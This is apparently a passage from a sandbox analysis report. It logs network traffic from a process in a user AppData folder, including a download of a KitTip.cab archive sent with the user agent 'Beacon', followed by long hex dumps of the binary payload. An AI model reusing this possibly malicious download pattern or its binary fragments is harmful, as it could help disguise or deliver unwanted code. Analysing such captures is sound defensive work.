                                                                                      2023-08-04 16:48:23 UTC3INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 0e c4 51 12 00 04 00 00 00 01 00 00 0e c4 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                      Data Ascii: JFIF``ZExifMM*JQQQCC


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      10192.168.2.349753104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:49:52 UTC2981OUTGET /gf/KitTip/KitTip.cab HTTP/1.1
                                                                                      User-Agent: Beacon
                                                                                      Host: dl.360safe.com
                                                                                      Cache-Control: no-cache
                                                                                      2023-08-04 16:49:52 UTC2981INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:52 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 454788
                                                                                      Connection: close
                                                                                      Expires: Fri, 04 Aug 2023 17:19:52 GMT
                                                                                      Last-Modified: Wed, 02 Aug 2023 03:13:18 GMT
                                                                                      Cache-Control: max-age=1800
                                                                                      KCS-Via: HIT from w-f03.lato;MISS from back-f03.dl.lato;REVALIDATED from w-subsrc02.lato
                                                                                      K-Cache-status: MISS
                                                                                      Accept-Ranges: bytes
                                                                                      2023-08-04 16:49:52 UTC2982INData Raw: 4d 53 43 46 00 00 00 00 84 f0 06 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 47 00 00 00 1c 00 01 00 e8 e2 0d 00 00 00 00 00 00 00 02 57 c9 56 20 00 4b 69 74 54 69 70 2e 64 6c 6c 00 7f 36 09 c8 9a 46 00 80 43 4b e5 bd 7d 7c 93 d5 fd 3f 7c a5 b9 5a d2 36 25 01 52 2c 50 a0 68 d4 62 0b 16 02 5a 4c d1 02 6d 01 69 e1 4a d3 26 30 a0 b8 af c8 6a 86 8a 90 00 6a 41 30 ad 6b 38 64 73 9b 6e 3a 9d 83 a9 9b 73 6e 2b c8 14 50 b1 25 d0 16 45 e5 41 11 87 3f e7 d3 dc c1 56 2d 03 a1 28 90 df e7 7d ce 95 36 2d 55 77 bf ee ef fd d7 dd be ae c7 f3 f4 39 9f e7 cf 39 e7 3a 29 fb c1 03 8a 51 51 14 95 8e 68 54 51 b6 2b f2 af 50 f9 fe 3f 93 41 51 fa 8f dc d9 5f d9 96 fc fa a8 ed 86 d2 d7 47 55 54 df ba 22 6b d9 f2 3b 7e b4 fc 87 b7 65 dd fc c3 db 6f
                                                                                      Data Ascii: MSCF,GWV KitTip.dll6FCK}|?|Z6%R,PhbZLmiJ&0jjA0k8dsn:sn+P%EA?V-(}6-Uw99:)QQhTQ+P?AQ_GUT"k;~eo
                                                                                      2023-08-04 16:49:52 UTC2997INData Raw: ec de 24 30 e7 75 f0 e6 9d e0 97 82 17 c1 4d cb c0 4d 83 c1 4d 30 42 85 30 51 d9 75 5d 9c 8c cc 39 c8 9c 8b cc 63 90 79 2c 32 5f 8d cc 79 17 b8 ab e3 62 7a 40 12 13 7e a0 4b 62 da ce 24 45 9f 5b fc ea c4 c5 92 f8 8f 79 3d 24 b1 2f 79 6c f8 fb d6 2f b7 74 ba 75 9f 6e 54 c3 9a e7 9e 22 0c 5f 4d c7 a4 ad 97 09 29 24 8b 20 fc 8f 05 f6 5c 04 41 0d 6f 53 da 0d f4 34 fd b9 4c ba 9b 45 e9 ee ad 67 b7 ac 02 ba a0 bb 86 43 5d 8e 7c 0b f8 01 1e 2f 83 5b 6e 47 3c 77 39 84 f2 0a 27 1c 06 c8 4e 36 8c 7e 0e 6c f1 18 c8 ce 58 a0 75 dc 1c c8 2d 1c 6e 07 8c fe 04 60 79 a2 21 26 b7 c0 5b 3e 54 f0 75 70 f0 9d 4f 03 c9 08 81 26 c3 5e 5d 7f 35 f0 fb 09 e5 45 fc 35 15 be f9 b4 3f 42 81 0e 87 ec a2 d5 12 0f 01 3d 03 5c 82 8a 6e 84 48 96 82 fa 65 88 a5 66 c3 d7 9c 33 04 5c 02 11
                                                                                      Data Ascii: $0uMMM0B0Qu]9cy,2_ybz@~Kb$E[y=$/yl/tunT"_M)$ \AoS4LEgC]|/[nG<w9'N6~lXu-n`y!&[>TupO&^]5E5?B=\nHef3\
                                                                                      2023-08-04 16:49:52 UTC3013INData Raw: af ef a6 ef 2b 4c af 0e 75 6f 0a dd 90 20 68 8c a3 ea 26 b1 09 4b 08 3e 27 c4 ef 19 28 7e 8f 92 e4 cc d9 06 77 a7 b6 73 a8 b0 e8 9c 05 ac 83 ed 5c cb 91 4d 6b 38 89 e3 b5 ae 49 1a 16 76 a3 19 0d f5 ea 3d 8a 3e 17 84 6e 18 6e 1c 50 37 54 f8 19 31 a4 2a bc d2 99 26 2c 50 0b 1a 61 84 3d d0 22 1c 04 00 8c 97 eb 82 d9 a6 2a 1a 52 81 da 55 a8 a6 7f dd f9 aa 40 b3 7b 81 c6 62 76 57 68 4a 58 eb e9 20 1e 19 d2 a1 71 de 4d 8c 6d 83 be 96 28 42 e1 39 33 4f 66 c0 f6 5f cf 4d b6 b5 30 d9 96 b1 19 77 2a 26 db 6b 18 c1 1c 30 f7 96 95 b0 fa 3b 24 b3 6d d8 d6 87 07 92 2c a1 27 b8 8a c0 cd d7 d7 9b 85 03 ec c3 78 09 90 04 c5 5c e7 a6 50 95 2f 18 3f 5e fc 6b c0 58 b5 86 93 a4 da 7f 23 01 6b 9d f5 9c e2 15 71 93 b4 ae 84 9d 91 24 57 20 84 c5 cc ea e8 03 0d ad 84 17 29 74 cd
                                                                                      Data Ascii: +Luo h&K>'(~ws\Mk8Iv=>nnP7T1*&,Pa="*RU@{bvWhJX qMm(B93Of_M0w*&k0;$m,'x\P/?^kX#kq$W )t
                                                                                      2023-08-04 16:49:52 UTC3029INData Raw: 7d 9e a5 4d c4 4f 72 f0 fb a9 c8 18 7e bb 83 63 53 c9 4c c8 83 76 b1 0f 6a 17 d3 06 bd 29 6c 0d b4 b2 60 67 d3 2f b0 98 b6 f9 de 83 37 e7 4d bf 17 2f 7d 47 ec a5 4d 40 ab 78 1c be 6f a0 58 7f 63 1b 7b 5e 04 be 5c f8 04 4d 97 cc 9d a9 be cf 84 3b a6 ee 71 da 38 bc ee 4c bd 46 4f 39 f8 23 09 09 60 a2 df 5e 3c 2e 17 b8 5f 66 63 0f 10 81 6a fe ab 55 f4 1a 6a 2a a6 67 07 7f 82 41 90 e3 45 6b a4 53 79 8f 39 d7 27 bd c7 01 7c 8f bf 3c 4d be 19 ae 2c 7e 88 82 4a 66 b7 94 48 d1 17 ba 90 f8 c1 76 ca 6e f9 3e 5d 5f 43 d7 a7 d3 b5 15 f9 b4 e8 9f 92 df 44 2f 98 dd dc 6f 42 be 96 44 f9 7a d9 74 2a 7c bd e2 4b e2 ab 07 f9 1a 2f f8 ba 18 58 f1 65 e3 49 77 a8 d2 22 aa 7c 48 54 39 ff 71 51 65 2b 35 c5 5c bd 4a e7 be 83 15 a7 54 e9 8c e4 4a 0f a3 38 63 8c 1e fe d8 ef 12 6b
                                                                                      Data Ascii: }MOr~cSLvj)l`g/7M/}GM@xoXc{^\M;q8LFO9#`^<._fcjUj*gAEkSy9'|<M,~JfHvn>]_CD/oBDzt*|K/XeIw"|HT9qQe+5\JTJ8ck
                                                                                      2023-08-04 16:49:52 UTC3045INData Raw: ab 0c 40 a3 c4 fa 48 5c 7a 5a a4 4b 4f 7f 16 88 bd 78 23 64 8e 9a a8 a6 f5 30 a5 20 79 58 43 21 92 cd b6 af 7c 83 dd e2 0d 59 0f 56 93 e2 db f2 a8 bc 98 a5 34 76 50 98 ae 73 04 c2 e2 d2 d9 b9 93 32 2a e5 d1 32 68 9b 40 4e da 79 92 6d 28 47 c9 23 a1 13 bf 7b f5 8f b2 86 a1 a9 4c b1 29 41 54 b5 22 78 5b c4 37 d4 b3 45 cc e0 90 c7 de 53 73 c4 ac bb 6d 11 c3 86 ed a1 bb 30 66 3c 06 24 df 8c 06 eb 29 dc e4 e4 60 61 a6 48 be b7 0e 29 ba b0 db a3 48 0b 85 3e 6a 46 bb a2 2b 26 16 1b 4f dd 30 51 da 45 3e 1e 6f 51 c8 8f 0b 1f 8d ec 01 14 aa 06 8c 88 8f 11 56 67 f3 f8 09 7a 49 be 20 8e 97 94 92 74 e3 c6 55 77 2c 79 ef 31 27 e4 0b 4a 39 8f 13 4f e6 12 09 3b a9 1b bd 9a 0d cd 7f c4 63 eb 39 e8 bc ad cd 10 78 81 07 ad 16 b7 28 a5 48 92 bc dd 69 77 fd 3b db 9d ff 8d f8
                                                                                      Data Ascii: @H\zZKOx#d0 yXC!|YV4vPs2*2h@Nym(G#{L)AT"x[7ESsm0f<$)`aH)H>jF+&O0QE>oQVgzI tUw,y1'J9O;c9x(Hiw;
                                                                                      2023-08-04 16:49:52 UTC3061INData Raw: c4 a2 8a 7e 1d 58 d5 1e 4b 89 f2 cf 02 5b df 0a 0e 38 83 46 e1 74 ff d3 a5 d2 ce 6d ae c3 0c ab 5c 64 10 e7 12 08 2a 82 46 c2 3c 04 6e 43 ae 87 9d 99 e9 b9 6b a4 6d b0 74 ae 72 2d d7 08 f0 cd b3 be 0e 25 cb 80 91 bd ee d0 b7 ad fd f6 37 ed 9d cf fb 32 ab d3 c5 e1 27 d8 78 9c 56 b4 f3 de f2 c0 fd 81 f9 e6 c0 7c 78 01 0f cc b7 07 e6 27 07 e6 a7 04 e6 3b 02 f3 53 03 f3 47 8b 74 e2 2d 01 2e 5e ae 9c 50 66 d9 a8 84 a5 3a 4e dd 9b d5 3a 6f 90 92 9f 92 d5 ea 35 aa 3b 5b f3 2d 8c c1 9f 88 d1 4e 9a f2 5e dc e4 e6 40 0e 8a 4c b9 9b 07 44 bf e3 c1 5d a1 ac 65 ef 13 61 3f ba d6 52 97 68 78 95 50 5b c5 81 16 a5 af 2a 22 93 1e bb 42 3f 0f ff 47 e2 8b 2a d2 c3 94 5f 0c f3 0e f5 8b 38 6f 3c fd f1 3d 41 f2 71 a5 32 d0 a5 59 40 f3 de 71 dc 55 30 16 95 55 75 87 6a b8 41 af
                                                                                      Data Ascii: ~XK[8Ftm\d*F<nCkmtr-%72'xV|x';SGt-.^Pf:N:o5;[-N^@LD]ea?RhxP[*"B?G*_8o<=Aq2Y@qU0UujA
                                                                                      2023-08-04 16:49:52 UTC3077INData Raw: 19 4d 80 fe 29 b6 8d 83 ee 5d 15 a7 4f db 36 ee d4 60 0c 80 5b 7a 35 07 cf da 36 9e 12 7b 69 22 da 9e eb 62 4b bb 77 62 ff 84 62 4e de b6 bc 4e 4f cf 32 e3 dd b1 83 76 da 18 0a f2 0e fe 8d a3 89 1f 59 9e 15 9e 26 ba 63 ef db 3d 3d 4b 2e e5 87 c8 b6 78 5e 4f de 3e cf b6 65 69 79 07 f3 8e 18 09 40 ff de bf 71 73 88 32 e4 86 d3 6d 1b ff de 3f 95 56 e3 9e d8 87 76 6a 92 a9 23 5a 6f 74 ef 3a 7d dc b6 71 9f 6d 63 a7 ed b9 01 82 1d d9 1a cf db 91 b7 d7 b3 95 40 8a 9d 94 31 b2 3d 9e b7 35 ef 98 67 3b da 20 ed 79 12 7a f8 2d 87 97 67 84 27 13 64 1b f2 f7 e4 ed e4 fc 33 fa ff 69 db a8 04 a9 b4 c0 b6 11 33 96 1d fb d4 6e 3a 53 c9 1a 96 70 d6 03 37 74 75 a2 4b ec 10 7b a4 a9 9f 07 e7 3a 53 c4 63 08 bb 28 f1 24 c2 a5 e4 7d 5e 19 75 ac 16 55 8e 22 31 bb b9 c8 b3 75 79
                                                                                      Data Ascii: M)]O6`[z56{i"bKwbbNNO2vY&c==K.x^O>eiy@qs2m?Vvj#Zot:}qmc@1=5g; yz-g'd3i3n:Sp7tuK{:Sc($}^uU"1uy
                                                                                      2023-08-04 16:49:53 UTC3093INData Raw: fe 50 38 42 f6 67 28 28 5f f9 9a 1e f8 84 8c 44 6b 87 3f e0 b7 52 07 fb c9 d7 80 4a d9 e2 b6 74 ab 9b e0 65 4e 86 37 9a f4 a3 e1 19 01 d9 76 7c 14 3a e8 ff 77 ef f8 b4 fe 75 16 a1 50 72 bb 00 3f 2d f8 74 45 c7 53 d2 ef 76 66 85 f0 0e 42 40 50 a7 22 13 4c 59 5f f9 06 58 e1 14 6b 4e 6f 41 33 8d 3e 96 5c 68 11 e9 e5 42 83 ff 24 f6 47 9a 2a ba 02 fb 07 42 f2 25 0e 3b e8 60 ad 37 aa 0b 76 e1 bc 2d 71 77 8c 6c c0 76 10 b1 81 f7 e9 da d2 06 bf 7f 0d 5d 84 fe 96 39 f4 3f 50 f1 e6 fe 74 d1 6b 18 8d 88 ec bb a9 d3 dd 20 f5 32 d6 03 be a1 e4 d4 c9 8d 8f 8e 4d 3a 56 07 ea fd f2 4a 92 fb 14 56 38 5d b8 bb e5 6f 95 04 1c 25 aa e7 fb 16 a2 5b 2e 34 96 e2 ca 97 2e 6b ce 08 41 6d 6f 96 ea d4 90 71 de 8e a0 38 84 50 1d f7 b1 de 5b dc 25 b6 87 92 2b 2c 7c 9e 51 f7 17 25 8a
                                                                                      Data Ascii: P8Bg((_Dk?RJteN7v|:wuPr?-tESvfB@P"LY_XkNoA3>\hB$G*B%;`7v-qwlv]9?Ptk 2M:VJV8]o%[.4.kAmoq8P[%+,|Q%
                                                                                      2023-08-04 16:49:53 UTC3109INData Raw: 92 a2 41 79 b9 f3 92 fc ec 41 35 55 48 b1 fc ec 01 b9 f3 b8 fc 6c 98 5d 90 9f bd 68 e8 7e 05 0f 1e 61 13 84 79 6d 8b e1 93 f7 cd 86 d7 41 10 70 bc be 54 5f 6d 88 18 ce 92 6d 5e a5 ae a4 52 37 b9 4b 5f af bb 78 b4 a4 5e b7 54 5f 66 e8 51 b5 2d 16 60 30 12 45 20 b4 50 8c 87 75 8b 85 0d 81 4d 4d 07 52 44 15 e8 61 16 c4 d9 78 be 5e eb b5 1c 1c 13 a3 34 c7 d3 17 b2 03 ea 78 4f 85 9e 54 60 4f ce 16 1c d1 fc 39 8a 94 e9 69 ea 14 5c 80 19 5b fb ea f4 94 98 9b 24 5f 1d 25 af 85 40 2c 6f e9 bd 80 12 d5 db d0 33 ac e0 00 86 bc c0 25 5d b0 bf 3e 64 f9 05 de 45 d3 37 53 48 0c df 98 c1 c0 49 89 9d 61 07 0e 9f be 37 87 2b 37 06 63 14 80 d6 7c f8 63 d6 83 58 12 3c e6 3f b2 b0 e1 0a c7 5f 80 2f c5 b0 e7 c1 ed dc ec 0c f4 69 1b 00 39 b9 2e 43 38 d0 a0 89 69 4d a0 74 43 7c
                                                                                      Data Ascii: AyA5UHl]h~aymApT_mm^R7K_x^T_fQ-`0E PuMMRDax^4xOT`O9i\[$_%@,o3%]>dE7SHIa7+7c|cX<?_/i9.C8iMtC|
                                                                                      2023-08-04 16:49:53 UTC3125INData Raw: 9a 7d 34 61 cd 96 da 97 83 70 64 5b 29 fc 1b 47 c6 9f 13 eb 77 78 77 ac 7c 14 5d bc 79 a3 8b 4a 45 06 25 eb 13 3b 8e da 53 18 55 09 8c 3b 87 ac 77 10 c1 f5 5c 27 f4 3f df 8b e1 5c a5 c2 32 3b c7 cd 03 0f ab 34 a9 f4 a6 ee c1 3f ab 87 64 89 44 2f bc 39 b6 8d a3 20 d2 85 14 d9 21 8d cf 48 a7 55 5b 6a 66 06 6c 80 d6 2d 46 42 2f 61 13 aa dc 6c 96 31 bc 8b cc ed fb 50 7e d2 f2 93 a9 44 02 d0 d7 13 d0 99 5e ce 7f 7a 6d ac a8 a5 e3 bf c8 10 a2 96 96 7f 20 10 6d 01 e0 6b f9 9b 8e 38 46 1b 05 f7 ed 87 d4 45 5f 6a a2 c3 0d 8e 15 c7 9c c8 69 81 e0 00 ae bb 1e 8a e0 1a 30 bb 3e 56 3f 55 98 70 33 30 3f 62 3f 08 6b 8c 15 18 1c 05 c0 6d 2d 01 ae 73 1e 6b ba 3a 77 b6 d5 77 25 6a 9c bc ef 9f 41 c9 64 32 5e 83 ca 4d 96 a5 49 40 27 42 fa e0 6c a9 4f ca d4 b0 1f 49 ac d1 50
                                                                                      Data Ascii: }4apd[)Gwxw|]yJE%;SU;w\'?\2;4?dD/9 !HU[jfl-FB/al1P~D^zm mk8FE_ji0>V?Up30?b?km-sk:ww%jAd2^MI@'BlOIP
                                                                                      2023-08-04 16:49:53 UTC3141INData Raw: f6 c3 eb 2a 06 54 f8 81 c5 a5 9f 05 3a 68 02 42 dd 9a 32 fb ab 39 7f 0e 75 a7 19 cf 12 fc 2a 8e 5f cf f9 d3 fe 83 57 c9 21 2c 7f 80 5a 85 50 16 03 f4 ff fd fe 23 11 ba 52 ce 06 34 52 6c a2 4a 8c 3b d1 64 16 46 e0 1e a9 98 93 8b cd c6 bd 74 19 8a 54 6c 5e e6 7f 67 6e 78 b4 bf 38 d2 d5 e4 7d 77 ef 4f 5f bf 4d 3f dd f5 43 b4 5e 85 af a2 f5 9f af 59 7a 3d 2f 95 99 e1 2b 78 c7 dd fb 2f 5f ff b9 01 a2 93 56 43 68 77 81 89 6c ef c8 02 4f 2a e3 a5 02 6b f4 7e b1 7c d4 ea 8a e5 b1 28 a8 2c 05 90 99 31 60 3d eb 3f 7a 93 f3 bd fb 8d 4a a1 49 de 1b ea 9d aa 2f 35 49 93 50 e2 38 46 42 d0 72 fb d2 ca a8 3d ee 84 f6 a5 c9 b6 fc 25 0b 49 1f c2 8b ce 1d 3b 02 85 17 47 52 b4 78 cb 66 b7 de b2 39 2b f4 0f 2e fd 03 cb 66 af 12 7d 19 8e be 98 a4 a5 1b 78 48 95 14 0d 30 46 5f
                                                                                      Data Ascii: *T:hB29u*_W!,ZP#R4RlJ;dFtTl^gnx8}wO_M?C^Yz=/+x/_VChwlO*k~|(,1`=?zJI/5IP8FBr=%I;GRxf9+.f}xH0F_
                                                                                      2023-08-04 16:49:53 UTC3157INData Raw: 72 8f ad ff 12 47 98 94 c9 07 8d 9c 61 a4 58 aa 4f 39 8e c1 db 79 f0 f2 f2 ba 5d 58 d4 07 e4 b1 d0 89 13 02 75 62 a0 cd f1 40 ee 89 f2 70 a3 4d e0 27 f3 f9 c0 2b 0d db d0 02 01 fd 0a 36 9b 1a c4 45 39 92 a5 b0 e5 4e ff f6 18 75 6f bf 8a 6d 8e 6b c3 76 d4 1c a2 65 1b e8 8e c1 6d ee a2 19 e1 41 08 d9 48 01 84 79 ad 01 44 2b 9e d4 10 f8 0b f5 67 5c 87 d0 34 3c c1 90 40 a3 b9 70 40 df 8e 29 b7 09 3d a1 4c 29 83 d7 4c 4f 08 48 1e e7 5b b3 62 11 01 07 cf 06 20 64 66 c5 d0 d1 b6 01 28 a9 83 03 81 2e 71 7f b8 76 cc 1a c1 dd ba 7c 78 ef 61 e5 a0 a5 f7 af 03 3f 67 0c 86 f5 d0 23 fe aa 45 e5 a4 9c a3 0a b5 b5 a5 c6 91 d0 1d 2e 56 68 06 ee a5 79 68 70 d7 d0 da 86 b6 c8 c9 97 51 a1 83 f2 19 be 9c e8 34 a9 04 9a d7 26 a3 b7 34 51 a3 1f df 70 a7 a7 d4 cb b4 6d d0 41 43
                                                                                      Data Ascii: rGaXO9y]Xub@pM'+6E9NuomkvemAHyD+g\4<@p@)=L)LOH[b df(.qv|xa?g#E.VhyhpQ4&4QpmAC
                                                                                      2023-08-04 16:49:53 UTC3173INData Raw: c1 a8 5f 7b 82 df 25 14 2f 2b ee f7 f3 04 bf 71 e8 17 c8 8e fb a9 09 7e 78 f0 6b 6f b7 e9 b7 61 a3 e9 fe 67 ba 6d 1c e0 ae b5 2f 5c 2c e0 05 38 70 47 20 ed bd a5 6e 33 fc 12 33 fc 7f a2 3b 2a 7f b9 7b a1 e9 fe 18 a5 53 c4 5d 73 5f 98 ec 81 f9 9b fa c2 64 dd 48 6e 13 c7 d9 aa 4d b8 0c 49 57 21 fd 4e c9 81 ba 67 ed 16 ba df 88 0e 1b 27 e3 a5 44 35 eb fb c0 b3 d6 a9 f6 45 75 33 fc 2e e8 44 d4 95 96 a2 7a af f2 24 db 51 84 b3 e2 a4 7e 77 8e 7e b7 3d e2 1f a6 f5 dd 19 88 f8 4f 86 ac 01 36 9e e0 51 f2 60 1a da 2e f0 0f 37 35 c4 f0 fa 1f f0 50 37 dd fd 25 5e 74 14 76 57 ba 66 44 8d ed bd 95 54 14 2a 87 dd db 76 a8 7d b4 14 13 47 4b 21 ec b6 2f 32 63 c9 25 78 4b d5 22 cd d4 e7 be 89 f7 cc fd c3 fa dc 83 f0 62 14 21 64 ad ff 29 9e 57 7a 88 b0 50 f2 e2 98 c6 a9 5c
                                                                                      Data Ascii: _{%/+q~xkoagm/\,8pG n33;*{S]s_dHnMIW!Ng'D5Eu3.Dz$Q~w~=O6Q`.75P7%^tvWfDT*v}GK!/2c%xK"b!d)WzP\
                                                                                      2023-08-04 16:49:53 UTC3189INData Raw: ee f9 46 8b d8 96 33 18 92 d9 81 a1 12 ec a8 c7 57 89 31 66 92 5d e7 d7 3a 20 65 57 13 6f 92 52 b2 1a 42 a2 16 55 07 9e cd a2 4d d5 43 c8 8d 67 b5 8e 61 01 8e e6 6a 89 ca cd 4a 11 0e 78 9e 0e 36 26 88 8a 70 1d ce 65 c9 9c 1f 77 7a ca 64 77 f2 4e dc 14 2c 73 05 d7 ce 70 75 f2 1c a4 94 50 5c 50 c4 46 92 e5 90 9d 4d 73 84 c3 d2 b2 eb 70 17 cd 30 b3 b4 3f a2 86 46 3b 2f f0 d5 ad ae f3 eb a6 32 2b a6 7e 4d 24 f5 3d cd 94 3a e0 73 b5 4f a8 9a ea 03 f4 c2 d0 a3 70 5f 67 d5 b8 b7 6a 4e e0 09 e7 da 21 38 18 3a 22 e0 b1 e7 17 14 17 f9 8c a8 9e 5d 20 95 da d5 55 16 4d 1b 1c 3e 4c 76 96 da 39 ff 0a 95 4e 98 5c 1f f0 bb 24 a3 b2 33 ac 0c f1 23 ce 3f 1f de a0 9a 01 2e 46 5d e7 b9 8d 2b 31 f2 18 64 cb d5 47 d9 0a 2d c1 2f 49 67 d4 30 54 83 8f 55 d0 56 7a 72 a4 22 92 71
                                                                                      Data Ascii: F3W1f]: eWoRBUMCgajJx6&pewzdwN,spuP\PFMsp0?F;/2+~M$=:sOp_gjN!8:"] UM>Lv9N\$3#?.F]+1dG-/Ig0TUVzr"q
                                                                                      2023-08-04 16:49:53 UTC3205INData Raw: b6 85 0f ab 5c 64 52 c5 ab 54 95 15 d1 a8 71 cc 4f c2 d6 18 b8 71 6f a0 0a 1b 1f d6 98 49 ef fa 22 e3 50 31 35 a0 94 3a 89 fa a3 ed 60 85 5a 36 3c d3 24 56 30 94 f7 03 76 67 01 ab 64 fe 69 a7 f4 8e 1e 30 fb bb 5f b1 34 06 71 9c 4c 9a 84 cf a7 93 be 3a 9f ae ee 73 bd 56 b6 e5 f1 6a 48 4b cf 1c cb 26 fe 0e 84 bb 05 e1 a2 fc 06 52 74 dc ba 15 a8 fa 9e 0c cb 66 6e ba c4 3c 0f e2 43 48 a7 7c b0 30 60 08 f6 08 2a c6 0a 37 7c 5c ba ac 08 6b a8 aa 7d fa fe fd 1a fe de 14 9f b5 c2 80 53 cd 84 df e0 c5 66 7a 5b a6 81 37 58 2b 18 3e 2a 03 3a 63 9c a2 e2 69 4e 8d e6 22 21 02 8a 5a 8e cd da 8e 5a 9d be 4c 26 a0 d4 89 a3 9c ce 88 c0 72 2a 13 b0 dc 91 4d 7e 8d 4a 93 ac 51 19 27 fd 8f e7 42 35 2a e3 07 d0 9b 81 73 57 d5 8b 7e dd 49 ba 62 d5 d1 13 bf 61 58 f3 6f 9b a8 6d
                                                                                      Data Ascii: \dRTqOqoI"P15:`Z6<$V0vgdi0_4qL:sVjHK&Rtfn<CH|0`*7|\k}Sfz[7X+>*:ciN"!ZZL&r*M~JQ'B5*sW~IbaXom
                                                                                      2023-08-04 16:49:53 UTC3221INData Raw: 51 e8 91 89 79 76 9b b5 59 5b b0 c1 70 8c 0b c9 ef ee e0 97 a0 0d 23 22 1f 9f c7 ea 9f e2 ea 88 7c 61 1e fb dd 9f 23 91 50 ed 19 36 95 3e a7 57 10 83 1a cf 11 bb 69 ed 06 f3 ee db 35 d4 a3 d5 97 1e ec 7c 80 2e 7e 81 5f 34 ad af 7f 1e 19 11 d2 b8 27 bf b8 32 58 80 ef 92 4a 51 20 42 be 67 c1 30 4f 7c 35 4c fc 5e ee d1 07 91 1f 33 84 73 5c 5e 79 9d 5e be 15 25 6d 49 f5 1d 7f ae 27 df b6 e6 7f 50 b5 71 d5 16 fa 24 0a 8c bf 71 c4 05 cf dc 51 84 61 48 56 da 43 31 64 09 cb 7c 15 22 0b bb c3 82 6e 3a 61 3c c9 68 aa 9a ef d5 c8 7f a8 e0 4b 3d b3 82 29 9b ca 30 48 ff 3a 1d 2f 88 37 b3 58 7c 10 26 bf 40 22 75 bd 3e 9d 5b a5 fd 35 12 8d ad a3 95 23 ff 70 93 d2 5f 20 7e 54 00 a8 fa b8 af 4d ee c0 17 d3 af c4 9f 54 01 6d db f1 81 c9 f1 c4 af a8 d4 cb 9f 52 2f e7 e0 ef
                                                                                      Data Ascii: QyvY[p#"|a#P6>Wi5|.~_4'2XJQ Bg0O|5L^3s\^y^%mI'Pq$qQaHVC1d|"n:a<hK=)0H:/7X|&@"u>[5#p_ ~TMTmR/
                                                                                      2023-08-04 16:49:53 UTC3237INData Raw: 8f 1c cd 71 ab ee cc 39 66 77 f0 85 43 ef 72 ea bb 9d fa 3f ec f1 57 88 a9 5a 4a f5 31 92 3c f1 81 1d 3f 30 d5 e2 ab e6 31 e4 da c1 3b 2b c5 93 fc 34 30 c2 7a 4f 7e 72 fe db f9 e2 24 3f cf fd 7c 61 69 d7 b1 dd 76 2d 8f 27 ce b1 dd 0e 2d 57 7f c9 71 6c 77 0e be 73 6e 35 f2 f5 3d 4e bd c7 a9 7f 6c 8f bf a9 18 c8 c2 4c 2c 31 d1 e4 bf 4f 09 25 10 51 be c8 70 2a 90 1e 0c 45 26 62 bd 36 08 1f 84 c8 b9 6e 7f 44 94 52 9b 4b a2 62 06 cf 5a f1 9a 7c 88 16 47 bd 2d 52 23 77 5e 6e b7 a9 75 13 95 93 99 37 2c ca 86 19 5e 73 d8 35 28 5e 12 e6 ab 50 20 80 ec 27 51 26 ae 2e 3d 22 de 05 ab 1a 78 0c 20 01 ee c4 6c ac 99 55 fe dc 78 61 6d 54 ee 5b c1 42 dc 68 44 de f3 73 38 50 57 65 03 6d ce 62 80 8a c7 aa ec 59 61 de 8d c7 90 aa 9f 1c a3 15 ea 27 c7 69 79 fa c9 2b e2 c3 d9
                                                                                      Data Ascii: q9fwCr?WZJ1<?01;+40zO~r$?|aiv-'-Wqlwsn5=NlL,1O%Qp*E&b6nDRKbZ|G-R#w^nu7,^s5(^P 'Q&.="x lUxamT[BhDs8PWembYa'iy+
                                                                                      2023-08-04 16:49:53 UTC3253INData Raw: d6 0e a7 ed 5d 79 02 1d d0 11 d0 7e 85 d4 2c 91 5f 82 d4 b0 fa 97 0b 50 da ff 18 9f bc 0e f6 e1 3a bf 8f 6f 9f 9a 48 c0 ea fc 01 30 b5 22 b4 07 aa 3b 7d 48 54 97 f9 42 3f 24 b2 f0 ec 2f 71 d3 fc e5 02 f5 a5 22 f5 3e 58 d7 2b 70 a9 21 5d 88 2b c8 75 5e a3 ee 13 e4 78 ca 53 92 bd eb 3e 74 e4 de 4e 63 d9 08 ac 58 01 ff f5 a7 34 f7 07 d0 6b 43 1f 64 1f dd f8 de a7 49 84 dd 5f ea ba 99 d0 16 2a b0 ea 97 22 62 cb 75 c2 29 1c b1 d3 cb 90 8a f8 fc 7c de e0 50 42 7b 84 f6 0b 3d 38 cd 46 1c f9 e6 46 e8 87 e9 fa 5e 07 2b 2c 57 7d f1 09 41 2a 70 d1 15 cc 43 dc a0 2d 8f 0d 91 e5 50 81 c9 de 75 23 8a 55 eb 17 9a 14 97 9e 4d d8 8c 39 fc 5d 6c 77 22 a4 89 bd cb 69 4e c6 29 b3 77 3d 8f 75 dc dd 43 d0 f8 c4 db 88 f9 fa 9c a8 85 e0 9a 58 fd 2f 17 68 f3 7d fd e2 1e e1 4b 77
                                                                                      Data Ascii: ]y~,_P:oH0";}HTB?$/q">X+p!]+u^xS>tNcX4kCdI_*"bu)|PB{=8FF^+,W}A*pC-Pu#UM9]lw"iN)w=uCX/h}Kw
